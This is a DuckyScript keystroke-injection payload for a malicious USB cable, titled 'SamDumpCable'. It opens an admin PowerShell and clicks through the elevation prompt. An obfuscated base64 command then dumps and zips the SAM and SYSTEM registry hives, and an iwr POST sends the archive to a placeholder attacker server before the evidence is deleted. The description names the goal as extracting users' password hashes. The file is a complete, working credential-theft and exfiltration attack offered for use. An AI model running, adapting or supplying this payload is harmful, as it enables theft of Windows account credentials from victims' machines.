REM Title:         SamDumpCable
REM Description:   Dump users sam and system hive and exfiltrate them. Afterwards you can use a tool like samdump2, to get the users hashes.
REM Author:        0iphor13
REM Version:       1.0
REM Category:      Credentials
REM Requirements: OMG Firmware v.2.5 or higher

DELAY 1000
DUCKY_LANG de
DELAY 500

DELAY 1500
GUI r
DELAY 500
STRING powershell Start-Process powershell -Verb runAs
DELAY 500
ENTER
DELAY 1000

REM Change this Change this shortcut depending on the systems language (engl.: ALT y)
ALT j
DELAY 250

STRING powershell.exe -NoP -enc cgBlAGcAIABzAGEAdgBlACAAaABrAGwAbQBcAHMAYQBtACAAMQAzADMANwBPAE0ARwBzAGEAbQA7AHIAZQBnACAAcwBhAHYAZQAgAGgAawBsAG0AXABzAHkAcwB0AGUAbQAgADEAMwAzADcATwBNAEcAcwB5AHMAOwBDAG8AbQBwAHIAZQBzAHMALQBBAHIAYwBoAGkAdgBlACAALQBQAGEAdABoACAAIgAkAFAAVwBEAFwAMQAzADMANwBPAE0ARwBzAHkAcwAiACwAIAAiACQAUABXAEQAXAAxADMAMwA3AE8ATQBHAHMAYQBtACIAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgBQAGEAdABoACAATwBNAEcAZAB1AG0AcAAuAHoAaQBwADsAcgBlAG0AbwB2AGUALQBpAHQAZQBtACAAMQAzADMANwBPAE0ARwBzAHkAcwA7AHIAZQBtAG8AdgBlAC0AaQB0AGUAbQAgADEAMwAzADcATwBNAEcAcwBhAG0AOwBlAHgAaQB0AA==
DELAY 200
ENTER
DELAY 200

REM Insert your recieving servers IP here ----------------------------------------------------------
STRING iwr "http://0.0.0.0" -Method POST -InFile OMGdump.zip;Remove-Item OMGdump.zip;exit
DELAY 200
ENTER